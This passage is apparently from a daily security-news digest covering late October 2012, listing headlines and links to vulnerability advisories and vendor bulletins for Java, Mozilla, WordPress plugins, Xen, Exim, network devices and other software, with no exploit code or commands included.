http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00129.html

Firefox 16.0.2 Released
http://isc.sans.edu/diary.html?storyid=14398

Securing the Human Special Webcast - October 30, 2012
http://isc.sans.edu/diary.html?storyid=14392

Cyber Security Awareness Month - Day 26 - Attackers use trusted domain to propagate Citadel Zeus variant
http://isc.sans.edu/diary.html?storyid=14395

Mozilla Thunderbird 'window.location' Bugs Permit Cross-Site Scripting Attacks and May Let Remote Users Execute Arbitrary Code
http://www.securitytracker.com/id/1027704

Mozilla Seamonkey 'window.location' Bugs Permit Cross-Site Scripting Attacks and May Let Remote Users Execute Arbitrary Code
http://www.securitytracker.com/id/1027703

Mozilla Firefox 'window.location' Bugs Permit Cross-Site Scripting Attacks and May Let Remote Users Execute Arbitrary Code
http://www.securitytracker.com/id/1027701

SAP NetWeaver XML External Entity Flaw Lets Remote Users Obtain Files
http://www.securitytracker.com/id/1027700

Xen Domain Builder Size Validation Bug Lets Local Guest Administrators Deny Service
http://www.securitytracker.com/id/1027699

WordPress GRAND FlAGallery Plugin Multiple Vulnerabilities
http://secunia.com/advisories/51100/

Xen PV Domain Builder Kernel Decompression Denial of Service Vulnerability
http://secunia.com/advisories/51071/

IP.Board Unspecified Vulnerability
http://secunia.com/advisories/51104/

Drupal MailChimp Module Script Insertion Vulnerability
http://secunia.com/advisories/51061/

Exim DKIM DNS Decoding Buffer Overflow Vulnerability
http://secunia.com/advisories/51098/

Joomla! Freestyle Testimonials Component SQL Injection Vulnerability
http://secunia.com/advisories/51101/

Tiki Wiki CMS/Groupware "unserialize()" PHP Code Execution Vulnerability
http://secunia.com/advisories/51067/

RT RTFM Extension Article Creation Security Bypass Vulnerability
http://secunia.com/advisories/51062/

RT Multiple Vulnerabilities
http://secunia.com/advisories/51065/

IBM WebSphere MQ Multiple Java Vulnerabilities
http://secunia.com/advisories/51080/

IBM InfoSphere Streams Eclipse Help System Vulnerabilities
http://secunia.com/advisories/51073/

SAP NetWeaver XML External Entity Vulnerability
http://secunia.com/advisories/51063/

Ubuntu update for webkit
http://secunia.com/advisories/51070/

WordPress FireStorm Professional Real Estate Plugin "id" SQL Injection Vulnerability
http://secunia.com/advisories/51107/

Seotoaster 1.9 SQL Injection
http://cxsecurity.com/issue/WLB-2011120013

IrfanView TIFF Image Processing Buffer Overflow Vulnerability
http://cxsecurity.com/issue/WLB-2012100241

IrfanView FlashPix PlugIn Double-Free Vulnerability
http://cxsecurity.com/issue/WLB-2012100240

VLC Player 2.0.3 ReadAV Arbitrary Code Execution
http://cxsecurity.com/issue/WLB-2012100083

Google SketchUp 8 Stack Based Buffer Overflow Vulnerability
http://cxsecurity.com/issue/WLB-2012100239

Realplayer Watchfolders long Filepath Overflow
http://cxsecurity.com/issue/WLB-2012100238

NASA Tri-Agency Climate Education (TrACE) 1.0 SQL Injection
http://cxsecurity.com/issue/WLB-2012100237

NASA Tri-Agency Climate Education (TrACE) 1.0 XSS
http://cxsecurity.com/issue/WLB-2012100236

WordPress Easy Webinar Blind SQL Injection
http://cxsecurity.com/issue/WLB-2012100235

Aladdin Knowledge System Ltd. Active-X Buffer Overflow
http://cxsecurity.com/issue/WLB-2012100234

Inventory 1.0 SQL Injection
http://cxsecurity.com/issue/WLB-2012100233

Inventory 1.0 Cross Site Scripting
http://cxsecurity.com/issue/WLB-2012100232

Layton Helpbox 4.4.0 SQL Injection
http://cxsecurity.com/issue/WLB-2012100231

Layton Helpbox 4.4.0 Authorization Bypass
http://cxsecurity.com/issue/WLB-2012100230

Layton Helpbox 4.4.0 Password Disclosure
http://cxsecurity.com/issue/WLB-2012100229

Layton Helpbox 4.4.0 Stored Cross Site Scripting
http://cxsecurity.com/issue/WLB-2012100228

Layton Helpbox 4.4.0 login Bypass
http://cxsecurity.com/issue/WLB-2012100227

Layton Helpbox 4.4.0 Cross Site Scripting
http://cxsecurity.com/issue/WLB-2012100226

Layton Helpbox 4.4.0 Unencrypted Login
http://cxsecurity.com/issue/WLB-2012100225

Gramophone 0.01b1 Cross Site Scripting
http://cxsecurity.com/issue/WLB-2012100224

VideoPortalNeu SQL Injection
http://cxsecurity.com/issue/WLB-2011120016

FlirtPortal SQL Injection
http://cxsecurity.com/issue/WLB-2011120008

Social2 SQL Injection
http://cxsecurity.com/issue/WLB-2011120017

Microsoft Office Picture Manager 2010 memory corruption
http://cxsecurity.com/issue/WLB-2012100223

Microsoft Internet Explorer scrollIntoView Use-After-Free
http://cxsecurity.com/issue/WLB-2012100222

Oracle Java Font Processing maxPointCount Heap Overflow
http://cxsecurity.com/issue/WLB-2012100221

Contao 2.11.6 Path Disclosure
http://cxsecurity.com/issue/WLB-2012100220

Oracle Java Font Processing Glyph Element Memory Corruption
http://cxsecurity.com/issue/WLB-2012100219

Bitweaver 2.8.1 Cross Site Scripting & Local File Inclusion
http://cxsecurity.com/issue/WLB-2012100218

Apple QuickTime Player 7.7.2 Crash
http://cxsecurity.com/issue/WLB-2012100217

TIBCO Formvine vulnerability
http://cxsecurity.com/issue/WLB-2012100216

VaM Shop 1.69 Cross Site Scripting & SQL Injection
http://cxsecurity.com/issue/WLB-2012100215

ClanSphere 2011.3 Local File Inclusion & Remote Code Execution
http://cxsecurity.com/issue/WLB-2012100214

WordPress GRAND Flash Album Gallery SQL Injection & Disclosure & File Overwrite
http://cxsecurity.com/issue/WLB-2012100213

Drupal MailChimp 7.x Cross Site Scripting
http://cxsecurity.com/issue/WLB-2012100212

Oracle Java SE CVE-2012-5071 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56061

RT and RT RTFM Extension Security Bypass Vulnerability
http://www.securityfocus.com/bid/56291

Oracle Java SE CVE-2012-3216 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56075

Oracle Java SE CVE-2012-5083 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56025

Oracle Java SE CVE-2012-5073 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56080

Oracle Java SE CVE-2012-1532 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56051

Oracle Java SE CVE-2012-5069 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56065

Oracle Java SE CVE-2012-5068 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56076

Oracle Java SE CVE-2012-5070 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56079

Request Tracker (RT) Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/56290

Oracle Java SE CVE-2012-5085 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56067

Oracle Java SE CVE-2012-5079 Remote Security Bypass Vulnerability
http://www.securityfocus.com/bid/56082

Oracle Java SE CVE-2012-5086 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56039

Oracle Java SE CVE-2012-5075 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56081

Oracle Java SE CVE-2012-5077 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56058

Oracle Java SE CVE-2012-1533 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56046

Oracle Java SE CVE-2012-5072 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56083

Oracle Java Virtual Machine (JVM) CVE-2012-4416 Remote Information Disclosure Vulnerability
http://www.securityfocus.com/bid/55501

Oracle Java SE CVE-2012-5067 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56070

Oracle Java SE CVE-2012-1531 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56033

Oracle Java SE CVE-2012-3159 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56072

RETIRED: Apple iPhone/iPad/iPod touch Prior to iOS 6 Multiple Vulnerabilities
http://www.securityfocus.com/bid/55612

Oracle Java SE CVE-2012-1719 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/53950

Oracle Java SE CVE-2012-1716 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/53947

Oracle Java SE CVE-2012-1718 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/53951

Oracle Java SE CVE-2012-1723 Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/53960

Oracle Java SE CVE-2012-1713 Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/53946

Oracle Java SE CVE-2012-1717 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/53952

Oracle Java SE CVE-2012-1725 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/53954

Oracle Java SE CVE-2012-1720 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/53956

IBM Eclipse Help System Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/53884

CoDeSys Unspecified Directory Traversal Vulnerability
http://www.securityfocus.com/bid/56300

HelpBox Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/56298

SafeNet Privilege 'PrivAgent.ocx' ActiveX Controls Multiple Buffer Overflow Vulnerabilities
http://www.securityfocus.com/bid/56297

Inventory Multiple Cross Site Scripting and SQL Injection Vulnerabilities
http://www.securityfocus.com/bid/56293

Xen PV Domain Builder Kernel Decompression Local Denial Of Service Vulnerability
http://www.securityfocus.com/bid/56289

Perl CVE-2012-5195 Heap-Based Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56287

Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56285

Joomla! Freestyle Testimonials Component Unspecified SQL Injection Vulnerability
http://www.securityfocus.com/bid/56284

Tiki Wiki CMS Groupware 'unserialize()' PHP Code Execution Vulnerability
http://www.securityfocus.com/bid/56282

Inout Article Base 'ViewController.class.php' SQL Injection Vulnerability
http://www.securityfocus.com/bid/56266

Friday, October 26, 2012

Friday the 26th, Tomobiki


+ UPDATE: HPSBHF02819 SSRT100920 rev.2 - HP, 3COM, and H3C Routers & Switches, Remote Disclosure of Information
https://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?javax.portlet.tpst=ba847bafb2a2d782fcbb0710b053ce01&javax.portlet.prp_ba847bafb2a2d782fcbb0710b053ce01=wsrp-navigationalState%3DdocId%25253Demr_na-c03515685%25257CdocLocale%25253Dja_JP&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken

+ Microsoft Security Advisory (2755801) Update for Vulnerabilities in Adobe Flash Player in Internet Explorer 10
http://technet.microsoft.com/ja-jp/security/advisory/2755801

+ Linux Kernel 'ext4_convert_unwritten_exten()' Function Local Information Disclosure Vulnerability
http://www.securityfocus.com/bid/56238
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4508

Traffic-anonymizing software "Tor" observed at 10% of Japanese companies and organizations, according to a Palo Alto Networks survey
http://itpro.nikkeibp.co.jp/article/NEWS/20121025/432643/?ST=security

JVNVU#225404 Improper access restriction vulnerability in HP/H3C and Huawei network devices
http://jvn.jp/cert/JVNVU225404/

JVNVU#268267 Issue in multiple DomainKeys Identified Mail (DKIM) implementations
http://jvn.jp/cert/JVNVU268267/

Wordpress 3.4 Cross-Site Scripting Vulnerability
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00128.html

JVNDB-2012-005124 SSL server spoofing vulnerability in Zoner AntiVirus Free application for Android
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005124.html

JVNDB-2012-005123 Cross-site scripting vulnerability in wlcms-plugin.php in the White Label CMS plugin for WordPress
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005123.html

JVNDB-2012-005122 Cross-site request forgery vulnerability in wlcms-plugin.php in the White Label CMS plugin for WordPress
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005122.html

JVNDB-2012-005121 Sensitive information disclosure vulnerability in TIBCO Formvine
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005121.html

JVNDB-2012-005120 (JVNVU#160027) Denial of service (DoS) vulnerability in multiple Broadcom wireless chipsets
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005120.html

JVNDB-2012-005119 (JVNVU#872545) Buffer overflow vulnerability in Adobe Shockwave Player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005119.html

JVNDB-2012-005118 (JVNVU#872545) Arbitrary code execution vulnerability in Adobe Shockwave Player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005118.html

JVNDB-2012-005117 (JVNVU#872545) Buffer overflow vulnerability in Adobe Shockwave Player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005117.html

JVNDB-2012-005116 (JVNVU#872545) Buffer overflow vulnerability in Adobe Shockwave Player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005116.html

JVNDB-2012-005115 (JVNVU#872545) Buffer overflow vulnerability in Adobe Shockwave Player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005115.html

JVNDB-2012-005114 (JVNVU#872545) Buffer overflow vulnerability in Adobe Shockwave Player
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005114.html

JVNDB-2012-005113 Vulnerability in GNOME gnome-keyring
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005113.html

JVNDB-2012-005112 Sensitive information disclosure vulnerability in the Red Hat Network Configuration Client in rhncfg
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005112.html

JVNDB-2012-005111 Cross-site request forgery vulnerability in admin/index.php in RazorCMS
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005111.html

JVNDB-2012-005109 Cross-site scripting vulnerability in the language search component for Joomla!
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005109.html

JVNDB-2012-005108 Vulnerability in user/index_inline_editor_submit.php in ATutor AContent allowing arbitrary user passwords to be changed
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005108.html

JVNDB-2012-005107 SQL injection vulnerability in user/index_inline_editor_submit.php in ATutor AContent
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005107.html

JVNDB-2012-005106 Cross-site scripting vulnerability in Subrion CMS
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005106.html

JVNDB-2012-005105 Cross-site scripting vulnerability in file_manager/preview_top.php in ATutor AContent
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005105.html

JVNDB-2012-005104 Vulnerability in ATutor AContent allowing arbitrary user passwords or category names to be changed
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005104.html

JVNDB-2012-005103 SQL injection vulnerability in ATutor AContent
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005103.html

JVNDB-2012-005102 SQL injection vulnerability in admin/campaign-zone-link.php in OpenX
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005102.html

JVNDB-2012-005101 Cross-site scripting vulnerability in admin/plugin-index.php in OpenX
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005101.html

JVNDB-2012-005100 Cross-site request forgery vulnerability in Subrion CMS
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005100.html

JVNDB-2012-005099 SQL injection vulnerability in register/ in Subrion CMS
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005099.html

JVNDB-2012-005098 Cross-site scripting vulnerability in Subrion CMS
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005098.html

JVNDB-2012-005097 Vulnerability in ibacm allowing the ib_acm daemon log or the ibacm.port file to be overwritten
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005097.html

JVNDB-2012-005096 Denial of service (DoS) vulnerability in ibacm
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005096.html

JVNDB-2012-005095 Vulnerability in librdmacm allowing an application's address resolution settings to be set
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005095.html

JVNDB-2012-005094 Sensitive information disclosure vulnerability in libsocialweb
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005094.html

JVNDB-2012-005093 SQL injection vulnerability in admin/index.php in Subrion CMS
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005093.html

JVNDB-2012-005092 Cross-site scripting vulnerability in the poll module in Subrion CMS
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005092.html

JVNDB-2012-005091 Sensitive information disclosure vulnerability in libsocialweb
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005091.html

JVNDB-2012-005090 Denial of service (DoS) vulnerability in the strchr function in procmime.c in Claws Mail
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005090.html

JVNDB-2012-005089 Directory traversal vulnerability in gitolite
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005089.html

JVNDB-2012-005088 Buffer overflow vulnerability in client/fwknop.c in fwknop
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005088.html

JVNDB-2012-005087 Denial of service (server crash) vulnerability in fwknop
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005087.html

JVNDB-2012-005086 Arbitrary code execution vulnerability in OpenStack Object Storage (swift)
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005086.html

Cyber Security Awareness Month - Day 25 - Pro Audio & Video Packets on the Wire
http://isc.sans.edu/diary.html?storyid=14380

Bitweaver Input Validation Flaws Permit Cross-Site Scripting Attacks
http://www.securitytracker.com/id/1027698

WordPress Poll Plugin Multiple SQL Injection Vulnerabilities
http://secunia.com/advisories/50910/

bitweaver Multiple Cross-Site Scripting Vulnerabilities
http://secunia.com/advisories/51091/

ManageEngine SupportCenter Plus "fromCustomer" Cross-Site Scripting Vulnerability
http://secunia.com/advisories/50928/

WordPress FireStorm Professional Real Estate Plugin SQL Injection Vulnerabilities
http://secunia.com/advisories/50873/

phpMyBitTorrent Multiple Vulnerabilities
http://secunia.com/advisories/50829/

Ubuntu update for python3.1
http://secunia.com/advisories/51087/

RETIRED: Apple Mac OS X Security Update 2012-004 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/55623

Apple iOS SMS Spoofing Vulnerability
http://www.securityfocus.com/bid/55087

Google Chrome Prior to 17.0.963.83 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/52674

Google Chrome Prior to 17.0.963.65 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/52271

WebKit Multiple Unspecified Memory Corruption Vulnerabilities
http://www.securityfocus.com/bid/55534

WebKit Multiple Unspecified Remote Code Execution Vulnerabilities
http://www.securityfocus.com/bid/54680

Google Chrome Prior to 18.0.1025.151 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/52913

Google Chrome Prior to 19 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/53540

Google Chrome Prior to 18.0.1025.142 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/52762

Google Chrome Prior to 18.0.1025.168 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/53309

Bitweaver Multiple Cross Site Scripting and Local File Include Vulnerabilities
http://www.securityfocus.com/bid/56230

Oracle Java SE CVE-2012-0547 Remote Java Runtime Environment Weakness
http://www.securityfocus.com/bid/55339

fwknop Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/55617

phpMyFAQ 'index.php' Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/43560

Subrion CMS 'username' Parameter SQL Injection Vulnerability
http://www.securityfocus.com/bid/48224

Joomla! 'language search' Component Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/55858

Subrion CMS Multiple Cross Site Scripting and HTML Injection Vulnerabilities
http://www.securityfocus.com/bid/55502

VLC Media Player Read Access Violation Arbitrary Code Execution Vulnerability
http://www.securityfocus.com/bid/55850

Mozilla Firefox/Thunderbird/SeaMonkey 'defaultValue()' Security Bypass Vulnerability
http://www.securityfocus.com/bid/56155

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4191 Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56153

Mozilla Firefox/Thunderbird/SeaMonkey Cross Domain Information Disclosure Vulnerability
http://www.securityfocus.com/bid/56154

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4190 Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56151

Xen CVE-2012-3515 Local Privilege Escalation Vulnerability
http://www.securityfocus.com/bid/55413

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-1973 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55316

WordPress 'doing_wp_cron' Parameter Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56263

WordPress Poll Plugin 'wp-admin/admin-ajax.php' Script Multiple SQL Injection Vulnerabilities
http://www.securityfocus.com/bid/56249

WordPress FireStorm Professional Real Estate Plugin Multiple SQL Injection Vulnerabilities
http://www.securityfocus.com/bid/56248

Microsoft Office Picture Manager Memory Corruption Denial of Service Vulnerability
http://www.securityfocus.com/bid/56239

Linux Kernel 'ext4_convert_unwritten_exten()' Function Local Information Disclosure Vulnerability
http://www.securityfocus.com/bid/56238

AContent SQL Injection and Authentication Bypass Vulnerabilities
http://www.securityfocus.com/bid/56237

Thursday, October 25, 2012

Thursday the 25th, Senshō


+ CVE-2008-6536 Unspecified vulnerability in 7-zip
https://blogs.oracle.com/sunsecurity/entry/cve_2008_6536_unspecified_vulnerability
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6536

+ CVE-2012-5166 Denial of Service vulnerability in ISC BIND
https://blogs.oracle.com/sunsecurity/entry/cve_2012_5166_denial_of
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5166

Cloud Pre-Filter emergency server maintenance notice (October 28, 2012)
http://www.trendmicro.co.jp/support/news.asp?id=1856

Advisory: SafeGuard Configuration Protection - a tool to avoid potential issues after upgrading clients running Sophos Anti-Virus has now been released
http://www.sophos.com/en-us/support/knowledgebase/118461.aspx

Advisory: Shh/Updater-B False positives
http://www.sophos.com/en-us/support/knowledgebase/118311.aspx

[waraxe-2012-SA#094] - Multiple Vulnerabilities in Wordpress GRAND Flash Album Gallery P
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00126.html

[SECURITY] [DSA 2565-1] iceweasel security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00121.html

HP/H3C and Huawei SNMP Weak Access to Critical Data
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00122.html

[SECURITY] [DSA 2564-1] tinyproxy security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00125.html

[SECURITY] [DSA 2563-1] viewvc security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00123.html

[SECURITY] [DSA 2562-1] cups-pk-helper security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00124.html

VUPEN Security Research - Oracle Java Font Processing Glyph Element Memory Corruption Vulnerabil
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00120.html

VUPEN Security Research - Oracle Java Font Processing "maxPointCount" Heap Overflow Vulnerabilit
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00119.html

VUPEN Security Research - Microsoft Internet Explorer "scrollIntoView" Use-After-Free Vu
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00118.html

VUPEN Security Research - Microsoft Internet Explorer "OnMove" Use-After-Free Vulnerabil
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00117.html

[security bulletin] HPSBUX02824 SSRT100970 rev.1 - HP-UX Running Java, Remote Execution of Arbitrary Code, and Other Vulnerabilities
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00116.html

[security bulletin] HPSBHF02819 SSRT100920 rev.1 - HP, 3COM, and H3C Routers & Switches, Remote Disclosure of Information
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00115.html

DC4420 - London DEFCON - October meet - tomorrow, Tuesday 23rd October.
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00114.html

[ MDVSA-2012:168 ] hostapd
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00113.html

[SECURITY] [DSA 2561-1] tiff security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00110.html

VaM Shop Cross-Site Scripting and Blind SQL Injection Vulnerabilities
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00112.html

[SECURITY] [DSA 2560-1] bind9 security update
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00109.html

F5 FirePass SSL VPN 4xxx Series | Arbitrary URL Redirection
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00108.html

XSS Vulnerabilities in ClipBucket
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00107.html

XSS Vulnerabilities in CMSMini
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00106.html

XSS Vulnerabilities in TaskFreak
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2012-10/msg00105.html

From the World's Security Labs
Is the password "87654321" strong?
http://itpro.nikkeibp.co.jp/article/COLUMN/20121021/431302/?ST=security

JVNVU#160027 Denial of service (DoS) vulnerability in multiple Broadcom wireless chipsets
http://jvn.jp/cert/JVNVU160027/

JVNVU#872545 Multiple vulnerabilities in Adobe Shockwave Player
http://jvn.jp/cert/JVNVU872545/

Apple iTunes Memory Corruption and Application Crash Remote Vulnerability
http://www.securiteam.com/securitynews/6V0360075O.html

Endpoint Protector Multiple Web Vulnerabilities
http://www.securiteam.com/securitynews/6V03K155PO.html

Cyber Security Awareness Month - Day 24 - A Standard for Information Security Incident Management - ISO 27035
http://isc.sans.edu/diary.html?storyid=14371

3Com, HP, and H3C Switches SNMP Configuration Lets Remote Users Take Administrative Actions
http://www.securitytracker.com/id/1027694

VU#225404 HP/H3C and Huawei networking equipment h3c-user snmp vulnerability
http://www.kb.cert.org/vuls/id/225404

VU#268267 DomainKeys Identified Mail (DKIM) Verifiers may inappropriately convey message trust
http://www.kb.cert.org/vuls/id/268267

SUSE update for kernel
http://secunia.com/advisories/51099/

Joomla! Commedia Component "id" SQL Injection Vulnerability
http://secunia.com/advisories/51076/

Ubuntu update for python3.2
http://secunia.com/advisories/51089/

Winmail Server Multiple Script Insertion Vulnerabilities
http://secunia.com/advisories/50631/

WordPress Cimy User Manager Plugin "cimy_um_filename" Arbitrary File Disclosure Vulnerability
http://secunia.com/advisories/50834/

WordPress Spider Calendar Plugin "many_sp_calendar" Cross-Site Scripting Vulnerability
http://secunia.com/advisories/50981/

TIBCO Formvine Multiple Unspecified Vulnerabilities
http://secunia.com/advisories/51092/

OpenAthens SP for Java SAML Assertion Signature Validation Vulnerability
http://secunia.com/advisories/51084/

Oracle Solaris BIND Record Handling Lockup Vulnerability
http://secunia.com/advisories/51078/

Debian update for tinyproxy
http://secunia.com/advisories/51074/

Oracle Solaris 7-zip Unspecified Vulnerability
http://secunia.com/advisories/50926/

Liferay Portal Multiple Vulnerabilities
http://secunia.com/advisories/51095/

Debian update for viewvc
http://secunia.com/advisories/51072/

Debian update for iceweasel
http://secunia.com/advisories/50970/

Adobe Shockwave Player Multiple Vulnerabilities
http://secunia.com/advisories/51090/

HP-UX update for BIND
http://secunia.com/advisories/51096/

JetPort 5600 Hardcoded Credentials Security Issue
http://secunia.com/advisories/51083/

IBM AIX BIND Record Handling Lockup Vulnerability
http://secunia.com/advisories/51106/

Microsoft Office Word 2010 Stack Exhaustion
http://cxsecurity.com/issue/WLB-2012100208

Inout Article Base Ultimate 2 Blind SQLi & CSRF
http://cxsecurity.com/issue/WLB-2012100211

ENGINE 3.0 <= SQL Injection
http://cxsecurity.com/issue/WLB-2012100210

zomorrod Web Design SQL Injection Vulnerability
http://cxsecurity.com/issue/WLB-2012100209

REMOTE: Turbo FTP Server 1.30.823 PORT Overflow
http://www.exploit-db.com/exploits/22161

DoS/PoC: Apple QuickTime Player 7.7.2 Crash PoC
http://www.exploit-db.com/exploits/22214

DoS/PoC: Microsoft Office Word 2010 Crash PoC
http://www.exploit-db.com/exploits/22215

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3968 Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/55276

Mozilla Firefox, SeaMonkey, and Thunderbird CVE-2012-3969 Heap Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/55292

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3970 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55278

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3962 Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55342

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3960 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55325

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3963 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55340

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3964 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55322

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3967 Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55277

Mozilla Firefox/Thunderbird/Seamonkey CVE-2012-1970 Multiple Memory Corruption Vulnerabilities
http://www.securityfocus.com/bid/55266

